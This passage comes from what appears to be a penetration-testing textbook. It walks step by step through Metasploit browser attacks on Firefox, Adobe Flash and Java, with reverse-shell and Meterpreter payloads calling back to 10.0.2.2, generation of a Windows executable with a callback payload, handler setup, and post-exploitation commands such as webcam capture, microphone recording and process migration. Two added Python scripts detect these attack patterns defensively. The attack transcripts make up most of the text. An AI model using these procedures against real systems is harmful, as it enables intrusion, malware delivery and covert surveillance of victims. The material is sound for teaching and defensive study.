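        # Rule 2: web request to a bare-IP host on the default exploit server port.
        if ev.url:
            u = urlsplit(ev.url)
            if _is_ip_literal(u.hostname) and u.port == DEFAULT_EXPLOIT_SERVER_PORT:
                alerts.append(Alert("exploit-server-fetch", ev,
                                    f"fetched {ev.url} from an IP-literal host on port {u.port}"))
        # Rule 3: a host that just accepted SMB from a peer now connects back to that
        # same peer on some other port, the EternalBlue-then-callback sequence. Keyed
        # on the sequence, not the port, so a callback on 443 is caught as well.
        if ev.dport == SMB_PORT:
            recent_smb[(ev.dst, ev.src)] = ev.ts
        else:
            smb_ts = recent_smb.get((ev.src, ev.dst))
            if smb_ts is not None and timedelta(0) <= ev.ts - smb_ts <= window:
                alerts.append(Alert("smb-then-callback", ev,
                                    f"{ev.src} accepted SMB from {ev.dst} at {smb_ts.time()} "
                                    f"and called back on port {ev.dport}"))
    return alerts


# Constructed sample, using the addresses from this chapter's transcripts.
SAMPLE_LOG = """
2017-02-19T12:50:01 src=10.0.2.2 dst=10.0.15.210 dport=445
2017-02-19T12:50:03 src=10.0.15.210 dst=10.0.2.2 dport=4444
2017-02-19T12:51:10 src=10.0.2.93 dst=10.0.2.2 dport=8080 url=http://10.0.2.2:8080/bob
2017-02-19T12:51:12 src=10.0.2.93 dst=10.0.2.2 dport=4444
2017-02-19T12:55:00 src=10.0.2.50 dst=203.0.113.5 dport=443 url=https://www.example.com/
2017-02-19T12:56:00 src=10.0.2.50 dst=10.0.2.7 dport=445
""".strip().splitlines()

if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a.event.ts.isoformat()} [{a.rule}] {a.detail}")
```

Run directly, the script prints four alerts for the sample (the EternalBlue callback trips both rule 1 and rule 3); in practice the same rules would consume firewall or NetFlow records and feed an alerting pipeline rather than print.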
Metasploit Modules for Firefox
There are many reliable exploit modules that can be used against Firefox. Most are cross-platform and can successfully be used against both Windows and Linux targets.
Metasploit also has a module that can be used in social engineering attacks. It provides the user with a malicious add-on for Firefox. If the user runs the presented .xpi file, a shell is presented to the attacker.
Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
Firefox is attacked using the same techniques that are used against Internet Explorer. The attacker uses Metasploit to set up a web server hosting the exploit code and waits until the user of a vulnerable system browses to the web server. The exploit launches, and the payload is executed on the victim’s system. If the payload is interactive, then the attacker can continue to interact with the victim’s system.
To demonstrate the process, start an OpenSuSE 13.2 system; it includes Firefox 33.0 by default, and so it is vulnerable to the Firefox Proxy Prototype Privileged Javascript Injection attack.
Configuring the Exploit
On Kali, start the PostgreSQL server if it has not been started, then run msfconsole from the command line. Select the exploit
msf > use exploit/multi/browser/firefox_proxy_prototype
msf exploit(firefox_proxy_prototype) > info
... Output Deleted ...
Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
Retries  true             no        Allow the browser to retry the module
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  8080             yes       The local port to listen on.
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH                   no        The URI to use for this exploit (default is random)
Payload information:
Description:
This exploit gains remote code execution on Firefox 31-34 by abusing
a bug in the XPConnect component and gaining a reference to the
privileged chrome:// window. This exploit requires the user to click
anywhere on the page to trigger the vulnerability.
... Output Deleted ...
This module has two classes of targets: a JavaScript target that is appropriate for most systems, and a native payload that needs to match the architecture of the connecting system. Select the default JavaScript target, and configure the URIPATH.
msf exploit(firefox_proxy_prototype) > set target 0
target => 0
msf exploit(firefox_proxy_prototype) > set uripath bob
uripath => bob
Configuring the Payload
The JavaScript XPCOM Shell only allows a few possible payloads.
msf exploit(firefox_proxy_prototype) > show payloads
Compatible Payloads
===================
Name                       Rank    Description
----                       ----    -----------
firefox/exec               normal  Firefox XPCOM Execute Command
firefox/shell_bind_tcp     normal  Command Shell, Bind TCP (via Firefox XPCOM script)
firefox/shell_reverse_tcp  normal  Command Shell, Reverse TCP (via Firefox XPCOM script)
generic/custom             normal  Custom Payload
generic/shell_bind_tcp     normal  Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp  normal  Generic Command Shell, Reverse TCP Inline
Select the Firefox shell using reverse TCP. The listening host must be set, though the listening port (TCP/4444) can be left in its default state.
msf exploit(firefox_proxy_prototype) > set payload firefox/shell_reverse_tcp
payload => firefox/shell_reverse_tcp
msf exploit(firefox_proxy_prototype) > set lhost 10.0.2.2
lhost => 10.0.2.2
msf exploit(firefox_proxy_prototype) > show options
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
Retries  true             no        Allow the browser to retry the module
SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT  8080             yes       The local port to listen on.
SSL      false            no        Negotiate SSL for incoming connections
SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
URIPATH  bob              no        The URI to use for this exploit (default is random)
Payload options (firefox/shell_reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  10.0.2.2         yes       The listen address
LPORT  4444             yes       The listen port
Exploit target:
Id  Name
--  ----
0   Universal (Javascript XPCOM Shell)
Launching the Exploit as a Background Job
Start the exploit as a job by running
msf exploit(firefox_proxy_prototype) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.0.2.2:4444
[*] Using URL: http://0.0.0.0:8080/bob
msf exploit(firefox_proxy_prototype) >
[*] Local IP: http://10.0.2.2:8080/bob
[*] Server started.
Interacting with the Shell
On the OpenSuSE 13.2 system, use Firefox to navigate to the malicious content, hosted in this example at http://10.0.2.2:8080/bob. The user is presented with a page saying that the page has moved and to click to redirect. As soon as the user clicks in the browser, the attacker is notified that a session has been established.
[*] 10.0.2.93 firefox_proxy_prototype - Gathering target information for 10.0.2.93
[*] 10.0.2.93 firefox_proxy_prototype - Sending HTML response to 10.0.2.93
[*] Command shell session 1 opened (10.0.2.2:4444 -> 10.0.2.93:51118) at 2017-02-19 12:52:44 -0500
It may appear that nothing has occurred; this is not the case. Instead, shell commands can be run as if the attacker had a shell on the system but without a prompt.
The session can be moved to the background by pressing CTRL+Z.
^Z
Background session 1? [y/N] y
msf exploit(firefox_proto_crmfrequest) >
Metasploit: Attacking Flash
It is possible to attack a component of the browser, rather than the browser itself. One common browser plugin is Adobe Flash Player, and there are reliable Metasploit modules that attack the Flash plugin on Windows systems. Beginning with Windows 8, Microsoft includes a version of Adobe Flash Player in the default installation configured for Internet Explorer and Edge. Windows 8 includes Adobe Flash Player 11.3.372, Windows 8.1 includes 11.8.800, the initial Windows 10 release (version 1504, build 10240) includes Adobe Flash Player 18.0.0, while the anniversary edition (version 1607, build 14393) includes Adobe Flash Player 22.0.0, and the Fall Creators Update (version 1709) includes Adobe Flash Player 27.0.0.
Metasploit Modules for Adobe Flash Player
The following are reliable attacks against Adobe Flash Player. This list includes the description of the attack, the Metasploit name, and the CVE number of the corresponding vulnerability as well as the browser(s) and operating system(s) that can be affected. Many exploits affect a wide range of Flash Player versions; this list includes some of the commonly exploitable versions but is not exhaustive. If the exploit requires additional software to be present on the target, it is also noted.
Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability
Adobe Flash Player Regular Expression Heap Overflow
exploit/windows/browser/adobe_flash_regex_value
CVE 2013-0643
Internet Explorer 8 on Windows 7 (including SP1)
Flash Player 11.5, up to 11.5.502.146
Requires Java on the Target
Adobe Flash Player Integer Underflow Remote Code Execution
exploit/windows/browser/adobe_flash_avm2
CVE 2014-0497
Internet Explorer 8, 9, or 10 on Windows 7 (including SP1) or Windows 8
Flash Player 11.3 up to 11.3.372.94, Flash Player 11.7 up to 11.7.700.202 and other versions. The default Windows 8 included version of Flash is vulnerable.
Windows 7 (including SP1) or Windows 8.1 (not Windows 8), 32-bit
Internet Explorer or Firefox
Adobe Flash Player 18 up to 18.0.0.203
Attack: Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory
As an example of an Adobe Flash Player exploit, consider Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory. For the target, use a 32-bit Windows 8.1 system with Firefox 38.0.5 and Adobe Flash Player 15.0.0.189.
Configuring the Exploit
On the Kali system, start Metasploit and load the exploit.
msf > use exploit/windows/browser/adobe_flash_uncompress_zlib_uninitialized
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > info
Name: Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Description:
This module exploits an unintialized memory vulnerability in Adobe
Flash Player. The vulnerability occurs in the
ByteArray::UncompressViaZlibVariant method, which fails to
initialize allocated memory. When using a correct memory layout this
vulnerability leads to a ByteArray object corruption, which can be
abused to access and corrupt memory. This module has been tested
successfully on Windows 7 SP1 (32-bit), IE 8 and IE11 with Flash
15.0.0.189.
Like most Adobe Flash exploits, this exploit uses automatic targeting, so there is no need to change the target from the default. Set the URIPATH to something innocuous, say bob.
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set uripath bob
uripath => bob
Configuring the Payload
A reasonable payload is Meterpreter using a reverse TCP connection.
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
The only option that needs to be configured on the payload is the IP address; by default, the exploit uses TCP/4444 for the listening port.
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > set lhost 10.0.2.2
lhost => 10.0.2.2
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > show options
msf exploit(adobe_flash_uncompress_zlib_uninitialized) > [*] Started reverse TCP handler on 10.0.2.2:4444
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://10.0.2.2:8080/bob
[*] Server started.
Interacting with the Shell
When Firefox 38.0.5 in Windows 8.1 is used to browse to the URL hosting the malicious code (in this example http://10.0.2.2:8080/bob), the attacker is presented with a session.
[*] Server started.
[*] 10.0.15.207 adobe_flash_uncompress_zlib_uninitialized - Gathering target information for 10.0.15.207
[*] 10.0.15.207 adobe_flash_uncompress_zlib_uninitialized - Sending HTML response to 10.0.15.207
Many older exploits for Internet Explorer, Firefox, and Flash require the presence of Java on the target system. The primary reason for this is the need for a ROP chain. Since many modern computers prevent the attacker from executing code that the attacker has placed on the stack, attackers turned to the idea of using already present pieces of code loaded at known addresses. By carefully jumping from one piece of existing code to another, attackers can control program execution and so exploit the system. One common program with libraries loaded at known locations is Java 6, which is why it is required for some of the older exploits.
Java is a legitimate target on its own and can be attacked directly. One nice feature about Java attacks is that thanks to the JVM, most (though not all) are agnostic about the underlying platform. They (usually) work against both Windows and Linux targets and are independent of the underlying browser.
Metasploit Modules for Java
Effective Metasploit modules for Java include the following:
Attacks on Java follow the same structure seen for attacks on browsers and Adobe Flash Player. This example attacks a Mint 13 system running Firefox 12.0 with Java 7 Update 5 with the Java Applet JAX-WS Remote Code Execution attack.
Configuring the Exploit
Start both Mint 13 and Kali; on the Kali system, start msfconsole, select the appropriate attack, and use info to see the module details.
msf > use exploit/multi/browser/java_jre17_jaxws
msf exploit(java_jre17_jaxws) > info
Name: Java Applet JAX-WS Remote Code Execution
Module: exploit/multi/browser/java_jre17_jaxws
Platform: Java, Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-10-16
... Output Deleted ...
Available targets:
Id Name
-- ----
0 Generic (Java Payload)
1 Windows Universal
2 Linux x86
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 20480
Avoid: 0 characters
Description:
This module abuses the JAX-WS classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild
in November of 2012. The vulnerability affects Java version 7u7 and
earlier.
... Output Deleted ...
There are three choices for the target, including a Windows target and a Linux target. The default Java target has the advantage that it is independent of the target architecture and would work even if a Windows system running an exploitable Java version connected.
Configuring the Payload
Fewer payloads are available that use the Java target.
msf exploit(java_jre17_jaxws) > show payloads
Compatible Payloads
===================
Name Rank Description
---- ---- -----------
generic/custom normal Custom Payload
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
java/jsp_shell_bind_tcp normal Java JSP Command Shell, Bind TCP Inline
java/jsp_shell_reverse_tcp normal Java JSP Command Shell, Reverse TCP Inline
java/meterpreter/bind_tcp normal Java Meterpreter, Java Bind TCP Stager
java/meterpreter/reverse_http normal Java Meterpreter, Java Reverse HTTP Stager
java/meterpreter/reverse_https normal Java Meterpreter, Java Reverse HTTPS Stager
java/meterpreter/reverse_tcp normal Java Meterpreter, Java Reverse TCP Stager
java/shell/bind_tcp normal Command Shell, Java Bind TCP Stager
java/shell/reverse_tcp normal Command Shell, Java Reverse TCP Stager
java/shell_reverse_tcp normal Java Command Shell, Reverse TCP Inline
Select the Meterpreter payload that communicates through reverse HTTPS, set the listening port to 443 and the IP address of the listener to the address of the Kali system.
msf exploit(java_jre17_jaxws) > set payload java/meterpreter/reverse_https
payload => java/meterpreter/reverse_https
msf exploit(java_jre17_jaxws) > set lport 443
lport => 443
msf exploit(java_jre17_jaxws) > set lhost 10.0.2.2
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH bob no The URI to use for this exploit (default is random)
Payload options (java/meterpreter/reverse_https):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.2 yes The local listener hostname
LPORT 443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Generic (Java Payload)
Launching the Exploit as a Background Job
With the options validated, start the exploit as a background job.
msf exploit(java_jre17_jaxws) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://10.0.2.2:443
msf exploit(java_jre17_jaxws) >
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://10.0.2.2:8080/bob
[*] Server started..
Interacting with the Shell
From the Mint system, visit the malicious page, located in this example at http://10.0.2.2:8080/bob. Firefox on the Mint system shows nothing other than a blank page. On the Kali system, msfconsole reports that a session has been obtained. The attacker interacts with a Java Meterpreter session in essentially the same way as a native Meterpreter session.
The years 2012 and 2013 saw many attacks against Java; Oracle responded by dramatically tightening the security settings for Java. Beginning with Java 7 Update 10, Java applets not signed by a trusted Certificate Authority either would not run or would not run without explicit user approval. These defenses make this type of exploit more difficult but not impossible. Further, later browsers began detecting insecure versions of plugins and disabling them (Figure 2-1).
Figure 2-1
Firefox 38.0.5 on Windows 8.1 showing how vulnerable add-ons are detected
Configuring the Exploit and Payload
This example demonstrates the Java Applet ProviderSkeleton Insecure Invoke Method attack against a Windows 8 system running Internet Explorer 10 and Java 7 Update 21. Start the Windows system and the Kali system, run msfconsole, and configure the exploit.
msf > use exploit/multi/browser/java_jre17_provider_skeleton
msf exploit(java_jre17_provider_skeleton) > set uripath bob
uripath => bob
msf exploit(java_jre17_provider_skeleton) > set payload java/meterpreter/reverse_https
payload => java/meterpreter/reverse_https
msf exploit(java_jre17_provider_skeleton) > set lhost 10.0.2.2
lhost => 10.0.2.2
msf exploit(java_jre17_provider_skeleton) > set lport 443
[*] Started HTTPS reverse handler on https://10.0.2.2:443
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://10.0.2.2:8080/bob
[*] Server started.
Java Security Settings
If an Internet Explorer user on the Windows 8 system visits the page hosting the malicious code, they immediately receive a dialog box informing them that the current version of Java is insecure. Only by promising to update Java later is the user permitted to proceed. This, of course, assumes that the user first agreed to enable Java for Internet Explorer after it was installed (Figure 2-2).
Figure 2-2
Internet Explorer 10 notification that the user is using an out-of-date version of Java; taken from Windows 8
The malicious Java applet is then downloaded, but the browser will not run it; instead it informs the user that the application was blocked by security settings on the system. This dialog box does not even provide a bypass option. To proceed, the user must first visit the Java Control Panel, available from the Windows Control Panel, under the Programs group. The security level must be set to Medium, which allows unsigned applets to run (Figure 2-3).
Figure 2-3
The Java Control Panel on Windows 8
Once this change is made and the web page reloads, another security warning is provided to the user stating that they are using an insecure version of Java that is trying to run an unsigned applet (Figure 2-4).
Figure 2-4
Java Security Warning from Windows 8
Only after manually checking the accept box will the option to run the applet be given. Once the user presses run though, the malicious code is launched, and the attacker gains a shell on the target.
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/UzZM.jar
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/UzZM.jar
[*] Meterpreter session 1 opened (10.0.2.2:443 -> 10.0.15.208:49190) at 2017-02-14 20:04:44 -0500
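Seen from the defender's side, the request sequence above (a short landing path on a bare IP and port, a randomly named .jar fetched beneath it, then a fresh connection from the same client back to that host on the handler's port) is a detectable chain. The following is an added example, not code from the book: it checks for that chain over constructed proxy and firewall records in a simplified format, so the record layout and field order are assumptions.

```python
import re
from typing import List

# Constructed proxy records (not real data): <epoch> <client> <method> <url>.
# The first four lines mirror the request sequence in the transcript above.
PROXY_LOG = """\
1487120640 10.0.15.208 GET http://10.0.2.2:8080/bob
1487120641 10.0.15.208 GET http://10.0.2.2:8080/bob/
1487120642 10.0.15.208 GET http://10.0.2.2:8080/bob/UzZM.jar
1487120643 10.0.15.208 GET http://10.0.2.2:8080/bob/UzZM.jar
1487120650 10.0.15.207 GET http://www.example.com/index.html
1487120651 10.0.15.207 GET http://www.example.com/app/library.jar
"""

# Constructed firewall connection records: <epoch> <src> <dst> <dport>.
# The first line is the client's callback to the HTTPS handler on 443.
CONN_LOG = """\
1487120684 10.0.15.208 10.0.2.2 443
1487120700 10.0.15.207 93.184.216.34 443
"""

URL_RE = re.compile(r"^(?P<scheme>https?)://(?P<host>[^/:]+)(?::(?P<port>\d+))?(?P<path>/\S*)?$")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_proxy(text: str) -> List[dict]:
    """Parse the constructed proxy format into per-request dicts."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, client, _method, url = parts
        m = URL_RE.match(url)
        if not m:
            continue
        default_port = 443 if m["scheme"] == "https" else 80
        events.append({"ts": int(ts), "client": client, "host": m["host"],
                       "port": int(m["port"] or default_port),
                       "path": m["path"] or "/"})
    return events


def parse_conns(text: str) -> List[dict]:
    """Parse the constructed connection format into per-flow dicts."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, dst, dport = parts
        conns.append({"ts": int(ts), "src": src, "dst": dst, "dport": int(dport)})
    return conns


def find_applet_delivery(proxy_text: str, conn_text: str, window: int = 300) -> List[dict]:
    """Flag clients that fetched a .jar from a bare-IP host after first loading
    the directory the jar sits in, and then opened a new connection to that
    host on a different port within `window` seconds."""
    events = parse_proxy(proxy_text)
    conns = parse_conns(conn_text)
    hits, seen = [], set()
    for ev in events:
        if not ev["path"].lower().endswith(".jar") or not IPV4_RE.match(ev["host"]):
            continue
        key = (ev["client"], ev["host"], ev["path"])
        if key in seen:          # the jar is fetched twice in the transcript
            continue
        seen.add(key)
        jar_dir = ev["path"].rsplit("/", 1)[0].rstrip("/")
        landing = [e for e in events
                   if e["client"] == ev["client"] and e["host"] == ev["host"]
                   and e["ts"] <= ev["ts"] and e["path"].rstrip("/") == jar_dir]
        callbacks = [c for c in conns
                     if c["src"] == ev["client"] and c["dst"] == ev["host"]
                     and c["dport"] != ev["port"] and 0 <= c["ts"] - ev["ts"] <= window]
        if landing and callbacks:
            hits.append({"client": ev["client"], "host": ev["host"],
                         "landing": landing[0]["path"], "jar": ev["path"],
                         "callback_port": callbacks[0]["dport"]})
    return hits


if __name__ == "__main__":
    for hit in find_applet_delivery(PROXY_LOG, CONN_LOG):
        print(hit)
```

The named-host jar from www.example.com is deliberately left unflagged; a production rule would add reputation or allow-listing rather than rely on the bare-IP heuristic alone.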
Malware
As attacks against browsers and active content have become more common, software writers have responded by improving their code and their designs. The difficulty in attacking later versions of Java 7 is representative. No attacks have been discussed that target Java 8 (released in March 2014) or the Microsoft Edge browser (included in Windows 10 and released in July 2015).
Faced with these defenses, an attacker can turn to another weak point in the system - the user. An attacker that can convince a user to run software can use this as their initial vector into the system. Metasploit can be used to generate simple malware that provides an attacker a shell.
Malware Attack: Windows Executable
As an example of the process, suppose the attacker’s target is a 64-bit Windows 10 system, say Windows 10-1607.
Configuring the Malware
To generate the malware, the attacker starts Metasploit, but instead of running the use command with an exploit, they instead run the use command with a payload. Since the target is a 64-bit Windows system, a natural payload is a 64-bit Meterpreter using reverse HTTPS for communication.
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
The attacker then specifies the listening host and updates the listening port if desired.
msf payload(reverse_https) > set lhost 10.0.2.2
lhost => 10.0.2.2
Generating the Malware
To create the malware, the attacker uses the generate command. Running generate with the -h flag shows the available options.
msf payload(reverse_https) > generate -h
Usage: generate [options]
Generates a payload.
OPTIONS:
-E Force encoding.
-b <opt> The list of characters to avoid: '\x00\xff'
-e <opt> The name of the encoder module to use.
-f <opt> The output file name (otherwise stdout)
-h Help banner.
-i <opt> the number of encoding iterations.
-k Keep the template executable functional
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The Platform for output.
-s <opt> NOP sled length.
-t <opt> The output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war
-x <opt> The executable template to use
An attacker that wants to generate malware for a Windows system specifies the platform as windows, the output format as exe, and selects a file name.
msf payload(reverse_https) > generate -p windows -t exe -f windows_https_8443.exe
[*] Writing 7168 bytes to windows_https_8443.exe...
Handlers
Before the malware can be used, the attacker needs to set up a handler. When run, the malware will call back to the specified host (10.0.2.2 in this example). If that system is not ready to receive the callback, in the best-case scenario the malware will fail to run.
To set up the handler, the attacker uses the module exploit/multi/handler, then configures it with the payload it is designed to handle.
msf payload(reverse_https) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_https
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.2 yes The local listener hostname
LPORT 8443 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Wildcard Target
If the attacker wants to be able to use the handler to respond to multiple requests, the option ExitOnSession should be set to false.
msf exploit(handler) > set exitonsession false
exitonsession => false
Launching the Exploit as a Background Job
The attacker then runs this exploit as a background job.
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started HTTPS reverse handler on https://10.0.2.2:8443
[*] Starting the payload handler...
msf exploit(handler) >
The to_handler Command
As an alternative to manually configuring a handler and launching it, an attacker can use the command to_handler. This creates a background handler for the currently configured payload and launches it as a background job. The option ExitOnSession is set to true by default.
Suppose that the target of the attack is not a Windows system, but instead a 32-bit Linux system. The process of generating the malware follows the same basic lines. First, the attacker selects an appropriate payload, say a 32-bit Meterpreter for Linux.
msf > use payload/linux/x86/meterpreter/reverse_tcp
The options need to be set; in this case the only needed option is the address of the listening host that will receive the callback.
To prepare the handler that will receive the callback, the attacker uses exploit/multi/handler choosing the same payload and the same options as the malware.
msf payload(reverse_tcp) > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 10.0.2.2
lhost => 10.0.2.2
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 10.0.2.2:4444
msf exploit(handler) >
The attacker could also use the to_handler command.
When the malware is run on a remote system, the attacker receives a shell.
[*] Sending stage (826840 bytes) to 10.0.3.43
[*] Meterpreter session 1 opened (10.0.2.2:4444 -> 10.0.3.43:52413) at 2017-08-20 17:51:40 -0400
Metasploit and Meterpreter Commands
Metasploit and Meterpreter both feature a full range of commands.
Metasploit
Metasploit is used to manage exploits and sessions.
Help
Although the msfconsole program is a purely command-line driven program, significant effort has been expended to make it easier to use. It uses full tab completion, so partially remembered exploit or option names can be found with a few presses of the tab key.
It provides a help system via the help command.
msf exploit(handler) > help
Core Commands
=============
Command Description
------- -----------
? Help menu
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
... Output Deleted ...
Detailed help on any command is available by prepending help to the name of the command.
msf exploit(handler) > help exploit
Usage: exploit [options]
Launches an exploitation attempt.
OPTIONS:
-e <opt> The payload encoder to use. If none is specified, ENCODER is used.
-f Force the exploit to run regardless of the value of MinimumRank.
-h Help banner.
-j Run in the context of a job.
-n <opt> The NOP generator to use. If none is specified, NOP is used.
-o <opt> A comma separated list of options in VAR=VAL format.
-p <opt> The payload to use. If none is specified, PAYLOAD is used.
-t <opt> The target index to use. If none is specified, TARGET is used.
-z Do not interact with the session after successful exploitation.
Managing Sessions
Metasploit can handle multiple attacks and run multiple sessions at the same time. For example, suppose that the attacker from the previous section who has successfully exploited a Windows 10 system also configures the Java Applet ProviderSkeleton Insecure Invoke Method, and a Windows 8 host visits the page hosting the attack; then the attacker will obtain a session on the second system.
msf exploit(java_jre17_provider_skeleton) >
[*] Using URL: http://0.0.0.0:8080/bob
[*] Local IP: http://10.0.2.2:8080/bob
[*] Server started.
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/PQTDaP.jar
[*] 10.0.15.208 java_jre17_provider_skeleton - handling request for /bob/PQTDaP.jar
A job can be terminated with the -k switch; this frees up any resources (e.g., URI, listening ports) from that job. If the -K switch is used, all current jobs are terminated.
Commands
Commands that are not interpreted by msfconsole directly are passed to the underlying shell for execution. For example, the command ifconfig provides its results directly from the Kali system on which msfconsole is running.
Many of the attacks discussed so far use Meterpreter as the preferred payload; this is because of its rich internal command set.
Networking
For example, once a Meterpreter session is established on a remote target, the ipconfig command and the route command provide information on the target's network interfaces and routes.
There are additional options available to an attacker running Meterpreter running natively on a Windows system. The time the system has been idle can be found with the command idletime, while screenshot returns an image of the target’s screen. The command webcam_list provides a list of the available web cameras on the system, and if any are available they can be used to take pictures with webcam_snap. If a microphone is present on the target, it can be used to make audio recordings with record_mic.
To obtain help on these, or any other Meterpreter command, run the command with the -h switch. Some, but not necessarily all, of these features are available on other versions of Meterpreter, like the Java Meterpreter or the native Linux Meterpreter.
File System
Meterpreter can be used to interact with the file system. The pwd command shows the current directory on the target, while ls lists the files in that directory.
meterpreter > pwd
C:\Users\jhaydn\Desktop
meterpreter > ls
Listing: C:\Users\jhaydn\Desktop
================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2017-03-19 23:01:42 -0400 Tools
The cd command is used to change directories, while rm is used to delete files from the target. Meterpreter also provides the ability to search for a file on the target with search, while files can be uploaded and downloaded with upload and download.
Navigating the directory structure on the attacking system is done with analogous local commands; this is useful when uploading files to the target.
meterpreter > lpwd
/root
meterpreter > lcd Desktop
meterpreter > lpwd
/root/Desktop
Processes
To run a new process on the target, use the execute command.
meterpreter > execute -h
Usage: execute -f file [options]
Executes a command on the remote machine.
OPTIONS:
-H Create the process hidden from view.
-a <opt> The arguments to pass to the command.
-c Channelized I/O (required for interaction).
-d <opt> The 'dummy' executable to launch when using -m.
-f <opt> The executable command to run.
-h Help menu.
-i Interact with the process after creating it.
-k Execute process on the meterpreters current desktop
-m Execute from memory.
-s <opt> Execute process in a given session as the session user
-t Execute process with currently impersonated thread token
The list of processes running on the remote target can be found with the command ps.
Native Windows Meterpreter does not usually run as its own process, but rather is injected into some other process; that PID can be found with getpid.
meterpreter > getpid
Current pid: 3788
Migrating Processes
On a Windows system running native Meterpreter, the command migrate can be used to change the hosting process, provided the attacker has sufficient privileges to do so.
meterpreter > migrate 448
[*] Migrating from 3788 to 448...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
A careful look at the response Metasploit provided when the MS13-055 CAnchorElement attack was launched (see the "Attack: MS13-055 CAnchorElement" section earlier in this chapter) shows the following:
[!] Meterpreter scripts are deprecated. Try post/windows/manage/migrate.
[!] Example: run post/windows/manage/migrate OPTION=value [...]
Because this is an older Metasploit module, it still includes an InitialAutoRunScript; this is a script that is meant to run immediately after the shell starts. In this case, the desired script is 'migrate -f', but as is shown, these have been deprecated.
When this exploit was launched, it spawned a Meterpreter shell running within the Internet Explorer process. However, if Internet Explorer is killed, the corresponding Meterpreter shell will also be killed. (This same problem occurs for some Firefox, Adobe Flash Player, and Java exploits.) Moreover, a user that sees an unresponsive or crashed browser window is likely to restart the browser, thus killing the Meterpreter shell. One solution is to quickly migrate to a different process; this is the purpose of the now deprecated InitialAutoRunScript.
Another option besides the migrate command is the module post/windows/manage/migrate. To use the module, load it as if it were an exploit module.
